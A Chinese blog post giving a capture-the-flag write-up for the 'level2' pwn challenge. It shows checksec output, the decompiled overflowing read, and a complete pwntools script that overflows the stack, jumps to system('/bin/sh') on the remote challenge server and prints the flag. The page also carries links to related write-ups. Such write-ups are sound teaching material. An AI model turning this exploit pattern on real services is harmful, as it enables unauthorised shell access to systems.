Xman pwn level2 writeup

最新推荐文章于 2022-03-26 16:12:36 发布
最新推荐文章于 2022-03-26 16:12:36 发布
阅读量980 收藏
点赞数
分类专栏: CTF pwn 文章标签: Xman pwn level2 writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39596232/article/details/100038883
版权
CTF 同时被 2 个专栏收录
13 篇文章 1 订阅
订阅专栏
pwn
12 篇文章 0 订阅
订阅专栏

题目描述:

菜鸡请教大神如何获得flag,大神告诉他‘使用`面向返回的编程`(ROP)就可以了’

解题思路:

1、首先使用file和checksec查看下程序的详细信息:

tucker@ubuntu:~/pwn$ file level2
level2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, 
interpreter /lib/ld-, for GNU/Linux 2.6.32, 
BuildID[sha1]=a70b92e1fe190db1189ccad3b6ecd7bb7b4dd9c0, not stripped

tucker@ubuntu:~/pwn$ checksec level2
[*] '/home/tucker/pwn/level2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

我们看到程序关闭了PIE

2、使用IDA打开:

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  system("echo Input:");
  return read(0, &buf, 0x100u);
}

我们看到溢出函数也很简单,因此此处我们可以构造payload获得shell,从而得到flag .

函数的栈帧如下:

3、溢出代码如下:

# level2.py

from pwn import *

elf = ELF("./level2")
a = remote("111.198.29.45", "41860")

# systemaddr = 0xf7def0e8
systemaddr = elf.symbols['system']
print(hex(systemaddr))
# binshaddr = 0xf7f5c0cf
binshaddr = elf.search('/bin/sh').next()
print(hex(binshaddr))

payload = "a" * (0x88 + 4) + p32(systemaddr) + p32(0x61616161) + p32(binshaddr)
a.recvuntil("Input:")
a.sendline(payload)
a.interactive()

运行即可得到flag:

tucker@ubuntu:~/pwn$ python level2.py 
[*] '/home/tucker/pwn/level2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Opening connection to 111.198.29.45 on port 41860: Done
0x8048320
0x804a024
[*] Switching to interactive mode

$ ls
bin
dev
flag
level2
lib
lib32
lib64
$ cat flag
cyberpeace{5ce465af919da0f58be7634a490b96d0}
$

 

tuck3r
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Xman非常好用
07-30
请勿在未经授权的情况下上传任何涉及著作权侵权的资源,除非该资源完全由您个人创作
攻防世界 reverse 逆向简单题练习区 答题(1-12题解)
小哈里的博客
01-11 9028
序 传送门:https://adworld.xctf.org.cn/task/ 1、game 题目描述:菜鸡最近迷上了玩游戏,但它总是赢不了,你可以帮他获胜吗 题目思路: 下载获得一个exe游戏文件 翻译: 玩游戏,n是灯的序列号,m是灯的状态,若是第n个灯的m是1,它就亮,若是不是,它就灭。 起初全部的灯都关了,如今你能够输入n来改变它的状态, 可是你要注意一件事,若是你改变第N个灯的状态,(N-1)th和(N+1)th的状态也会改变, 当全部灯都亮起时,将出现flag。 如今,输入n,n的值域
20210927gfsj_re_no_strings_attached
Leong_Vinson的博客
03-26 84
题目描述:菜鸡听说有的程序运行就能拿Flag? 拿进IDA,看到main函数调用了很多函数 int __cdecl main(int argc, const char **argv, const char **envp) { setlocale(6, &locale); banner(); prompt_authentication(); authenticate(); return 0; } 一个一个看下来,发现flag应该是藏在了authenticate()中 void a
攻防世界 pwn 二进制漏洞简单题练习区 答题(1-10题解)
小哈里的博客
01-12 5363
序 1、level0 题目描述:菜鸡了解了什么是溢出,他相信自己能得到shell 题目思路: 首先使用checksec检查文件保护机制,是多少位的程序。 64位程序,栈不能执行 继续丢入IDA。 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互。 进入vulnerable_function函数,通过伪代码分析逻辑,发现了栈溢出漏洞。 发现buf数组只有0x80字节,但是read函数从中读了0x200个。 或许咱们能够进行溢出,覆盖掉返回地址,
超全面 | 裸机安装Ubuntu16.04+NVIDIA驱动410.78+CUDA10.0+cuDNN10.0+openCV3.4.2+相机驱动+yolov4+ROS+ORB-SLAM2+VINS
Chen_Tianyang的博客
08-12 1593
超全面 | 裸机安装Ubuntu16.04 + NVIDIA驱动410.78 + CUDA10.0 + cuDNN10.0 + openCV3.4.2 + 相机驱动 + yolov4 + ROS + ORB-SLAM2 + VINS 1 准备U盘启动盘 2 安装系统Ubuntu16.04 3 系统汉化+中文输入 4 安装google浏览器 5 安装NVIDIA驱动410.78 6 安装CUDA10.0 7 安装CUDA10.0 8 安装openCV3.4.2 9 安装相机驱动MYNT-EYE
xctf--新手区--level2
gclome的博客
04-19 660
writeup: checksec查看保护机制 32位程序,开了NX和Partial RELRO 顺便运行一下: 接着放到IDA里面: 在这里可以看见buf长度是0x88,我们可以的输入0x100个字符,我们在这里是可以发生缓冲区溢出 可是这里并没有像上一题一样有一个直接调用system("/bin/sh")的函数,所以上题的方法显然走不通。 还记得题目描述吗?菜鸡请教大神如何获得flag,大...
xman-service-auth
05-28
用于节点js的xman oauth2-server 使用PostgreSQL和NodeJS Techstack的xman oauth 2服务器要求使用项目之前需要安装的东西Nodejs的节点包管理器PostgreSQL私钥和公钥ECDSA安装指南在使用项目的全部功能之前,需要做...
xman-frontend
05-29
Xman 前端 运行项目 克隆项目 运行npm install或yarn 运行npm start或yarn start 与后端集成 前端通过 REST API 连接到后端的不同服务。 服务的文档链接如下 如果您需要访问用户的访问令牌,您可以通过 import ...
xmdp:Xman 的桌面
05-29
XMDP是XMan’s Desktop Platform的简称。XMan是本文的作者,我们是一个小团体,就像电影里的那帮神奇能力者一样。我们打算构建自己的桌面平台,为了便于大家以及未来的成员开展工作,所以打算一边撰写相关的说明文档...
xman量化交易
02-28
视频教程 讲述xman量化交易平台,是一个基于js的量化交易平台
XCTF-pwn level2 - Writeup
菜小狗.的博客
08-02 4957
XCTF-pwn-level2 WP 终于可以写这个pwn题的wp咯~ 很开心,说明我又有一些收获来解决了一些问题 题目描述:菜鸡请教大神如何获得flag,大神告诉他‘使用面向返回的编程(ROP)就可以了’ 先将elf文件下载丢到乌班图里查看一下文件类型,通过checksec查看一下保护情况最后在运行一下瞅瞅到底运行起来是杂肥似。 可以看到NX这项保护是开启的状态,这意味着:栈中数据没有执行...
level2(xctf)
weixin_43868725的博客
05-06 552
0x0 程序保护和流程 保护: 逻辑: main() vulnerable_function() 很明显是一个栈溢出漏洞。 0x1 利用过程 既然系统给了一个system(),那么只需要/bin/sh就可以getshell了。所以要么我们自己构造要么去二进制文件中寻找。 找到了字符串之后就可以对漏洞进行利用了。根据32位可执行文件的调用函数的参数入栈顺序,我们可以将buf=‘a’*(0x8...
攻防世界 pwn 新手练习区 level2
ChaoYue_miku的博客
07-05 930
题目描述:菜鸡请教大神如何获得flag,大神告诉他‘使用面向返回的编程(ROP)就可以了’ ** 0、使用file命令查看文件类型,使用checksec查看保护情况,尝试打开文件 ** 32位ELF文件,开启了NX保护和部分地址随机化 (其实checksec就有包含了file的功能) ** 1、使用IDA32 Pro打开文件 ** 题目描述中有提示:面向返回的编程(ROP),所以就要寻找并构造ROP链。 首先查看main()函数 发现有一个vulnerable_function()函数,点进去看一下
[pwn] - xctf题目wp
s11show_163的博客
04-26 335
int_overflow exp.py: #!/usr/bin/env python from pwn import * sh = remote("124.126.19.106",42438) flag_addr=0x08048694 payload = 'A'*0x14 + 'AAAA' + p32(flag_addr) + 'a'*(256-0x14-4-4+5) #‘A’*0x14是...
ROP 返回导向编程 攻击
10-29 4215
之前工作中一直研究ARM 体系结构函数调用标准(AAPCS),分析栈中内存溢出对ARM 体系结构函数调用产生的影响。 Android 的流行促进了hacker 对 Android root 的研究,最出名的莫过于 基于堆栈溢出攻击的 ROP gadgets ROOT方法。 首先看下ROP的基本概念(摘自wiki): http://zh.wikipedia.org/wiki/%E8%B
XMAN选拔赛官方Writeup
热门推荐
zsj2102的专栏
07-20 2万+
XMan选拔赛官方Writeup XMan 2017 Baaa [原理] 栈溢出。 [目的] 盲打栈溢出。 [环境] Ubuntu。 [工具] gdb、objdump、python。 [步骤] 拿到题目,发现并没有给二进制,估计是盲打。nc一下,发现返回了一个地址,我们尝试不同大小payload,最后确定下来大约为72位junk加上16位的地址。 exp from
攻防世界base除4_攻防世界pwn新手训练
weixin_36310597的博客
12-24 548
小白刚开始接触pwn,做点新手训练了解一下pwn是干啥的。一开始啥漏洞都不知道,很多都是看别人的wp才知道要干嘛,比如才知道原来printf函数也是有漏洞的。 把这些题的思路和做法记录下来,不然我这鱼的记忆肯定过几天就又忘了get_shell题目描述:运行就能拿到shell呢,真的如题,nc连接,连接直接就是shell,直接cat flag就可以了。CGfsb题目描述:菜鸡面对着pringf发愁,...
XMAN := xman -prj ${PRJ_NAME}详细解释解释上述makefile
最新发布
04-28
这是一个 Makefile 中的变量赋值语句,它将 xman 变量的值设置为 `${PRJ_NAME}` 变量的值,并在变量名称前添加了 `-prj` 前缀。这个 Makefile 似乎是为了某个工程项目(即 `${PRJ_NAME}`)而编写的,XMAN 变量可能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值